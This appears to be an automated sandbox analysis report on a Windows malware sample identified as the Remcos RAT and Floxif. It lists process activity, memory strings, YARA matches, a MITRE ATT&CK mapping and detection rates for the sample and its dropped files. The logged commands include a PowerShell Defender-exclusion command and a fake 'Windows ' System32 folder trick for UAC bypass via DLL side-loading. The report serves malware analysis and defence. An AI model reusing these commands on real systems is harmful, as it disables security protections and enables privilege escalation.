Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

Thread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exe

Jump to behavior

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\easinvoker.exe C:\Windows \System32\easinvoker.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe

Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: =AProgram ManagerpszDesktopTitleWM
Source: 0vJrK0NCd1.exe, 00000000.00000003.376967182.000000000341B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TargetundeleteSoftware\Microsoft\Tracking\TimeOut::{9db1186e-40df-11d1-aa8c-00c04fb67863}:Shell_TrayWnd
Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: GShell_TrayWndLangIDgophernewsmailtosocksjavascriptvbscriptres
Source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: 0vJrK0NCd1.exe, 00000000.00000003.392885475.0000000003411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ADWMWINDOWDWMTOUCHThemeInitApiHook%s\uxtheme.dllDllNameThemeActiveLoadedBeforeLastUserLangIDLastLoadedDPILastLoadedDPIPlateausLastLoadedPPIColorNameSizeNameSoftware\Microsoft\Windows\CurrentVersion\Policies\System SetVisualStyle\rundll32.exeThemeDebuggeesshakeShell_TrayWndTEXTGLOW%s::%s%s\...%s\%s\%s.msstylesLMVersionLMOverRide
Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
Source: 0vJrK0NCd1.exe, 00000000.00000003.376605940.0000000002E65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndButtonLayoutSoftware\Microsoft\Internet Explorer\LowRegistry\CommandBarbinaryDllCanUnloadNowSoftware\Microsoft\F12ShowToolsun
Source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows \System32\easinvoker.exe

Code function: 22_2_613C1A80 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

22_2_613C1A80

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.532520297.0000000000487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.637978823.0000000014C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.532520297.0000000000487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.637978823.0000000014C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	11 DLL Side-Loading	11 DLL Side-Loading	1 Disable or Modify Tools	121 Input Capture	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	312 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	121 Input Capture	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Scripting	Security Account Manager	13 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	21 Obfuscated Files or Information	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	113 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 DLL Side-Loading	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 File Deletion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	223 Masquerading	Proc Filesystem	11 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	21 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	312 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0vJrK0NCd1.exe	92%	ReversingLabs	Win32.Virus.Floxif
0vJrK0NCd1.exe	85%	Virustotal		Browse
0vJrK0NCd1.exe	100%	Avira	W32/Floxif.hdc
0vJrK0NCd1.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Libraries\netutils.dll	100%	Avira	TR/Starter.bwokf
C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp	100%	Avira	W32/Floxif.iici
C:\Windows \System32\netutils.dll	100%	Avira	TR/Starter.bwokf
C:\Users\Public\Libraries\Elpuxpki.PIF	100%	Avira	W32/Floxif.hdc
C:\Program Files\Common Files\system\symsrv.dll	100%	Avira	TR/Floxif.BB
C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Elpuxpki.PIF	100%	Joe Sandbox ML
C:\Program Files\Common Files\system\symsrv.dll	100%	Joe Sandbox ML
C:\Program Files\Common Files\system\symsrv.dll	92%	ReversingLabs	Win32.Virus.Floxif
C:\Users\Public\Libraries\Elpuxpki.PIF	92%	ReversingLabs	Win32.Virus.Floxif
C:\Users\Public\Libraries\easinvoker.exe	0%	ReversingLabs
C:\Users\Public\Libraries\netutils.dll	74%	ReversingLabs	Win64.Trojan.Barys
C:\Windows \System32\easinvoker.exe	0%	ReversingLabs
C:\Windows \System32\netutils.dll	74%	ReversingLabs	Win64.Trojan.Barys

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
balkancelikdovme.com	18%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://ocsp.suscerte.gob.ve0	0%	URL Reputation	safe
http://www.postsignum.cz/crl/psrootqca2.crl02	0%	URL Reputation	safe
http://www.postsignum.cz/crl/psrootqca2.crl02	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy0	0%	URL Reputation	safe
http://www.suscerte.gob.ve/lcr0#	0%	URL Reputation	safe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://postsignum.ttc.cz/crl/psrootqca2.crl0	0%	URL Reputation	safe
http://postsignum.ttc.cz/crl/psrootqca2.crl0	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl0	0%	URL Reputation	safe
http://www.suscerte.gob.ve/dpc0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
http://www.defence.gov.au/pki0	0%	URL Reputation	safe
http://www.sk.ee/cps/0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://www.ssc.lt/cps03	0%	URL Reputation	safe
http://ocsp.pki.gva.es0	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	0%	URL Reputation	safe
http://ca.mtin.es/mtin/ocsp0	0%	URL Reputation	safe
http://ca.mtin.es/mtin/ocsp0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://web.ncdc.gov.sa/crl/nrcacomb1.crl0	0%	URL Reputation	safe
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G	0%	URL Reputation	safe
https://wwww.certigna.fr/autorites/0m	0%	URL Reputation	safe
http://www.dnie.es/dpc0	0%	URL Reputation	safe
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	0%	URL Reputation	safe
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	0%	URL Reputation	safe
http://ca.mtin.es/mtin/DPCyPoliticas0	0%	URL Reputation	safe
http://www.globaltrust.info0	0%	URL Reputation	safe
http://www.globaltrust.info0=	0%	Avira URL Cloud	safe
http://www.certplus.com/CRL/class3TS.crl0	0%	URL Reputation	safe
http://ac.economia.gob.mx/last.crl0G	0%	URL Reputation	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
http://www.disig.sk/ca0f	0%	URL Reputation	safe
http://www.res://ieframe.dll/MonitoringEnableFeeds.htmres://ieframe.dll/WebPreviewLoading.htmres://i	0%	Avira URL Cloud	safe
http://www.sk.ee/juur/crl/0	0%	URL Reputation	safe
https://./key/plist/dictdictarrayTitleBookmarksBarBookmarksMenuURIDictionary	0%	Avira URL Cloud	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://certs.oati.net/repository/OATICA2.crl0	0%	URL Reputation	safe
http://crl.oces.trust2408.com/oces.crl0	0%	URL Reputation	safe
http://www.quovadis.bm0	0%	URL Reputation	safe
http://crl.ssc.lt/root-a/cacrl.crl0	0%	URL Reputation	safe
http://certs.oaticerts.com/repository/OATICA2.crl	0%	URL Reputation	safe
http://www.trustdst.com/certificates/policy/ACES-index.html0	0%	URL Reputation	safe
http://certs.oati.net/repository/OATICA2.crt0	0%	URL Reputation	safe
http://www.accv.es00	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy-G20	0%	URL Reputation	safe
https://www.netlock.net/docs	0%	URL Reputation	safe
http://www.e-trust.be/CPS/QNcerts	0%	URL Reputation	safe
http://www.e-trust.be/CPS/QNcerts	0%	URL Reputation	safe
http://ocsp.ncdc.gov.sa0	0%	URL Reputation	safe
http://ocsp.ncdc.gov.sa0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0	0%	URL Reputation	safe
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0	0%	URL Reputation	safe
http://web.ncdc.gov.sa/crl/nrcaparta1.crl	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;	0%	URL Reputation	safe
https://repository.luxtrust.lu0	0%	URL Reputation	safe
https://repository.luxtrust.lu0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://www.acabogacia.org0	0%	URL Reputation	safe
http://www.uce.gub.uy/acrn/acrn.crl0	0%	URL Reputation	safe
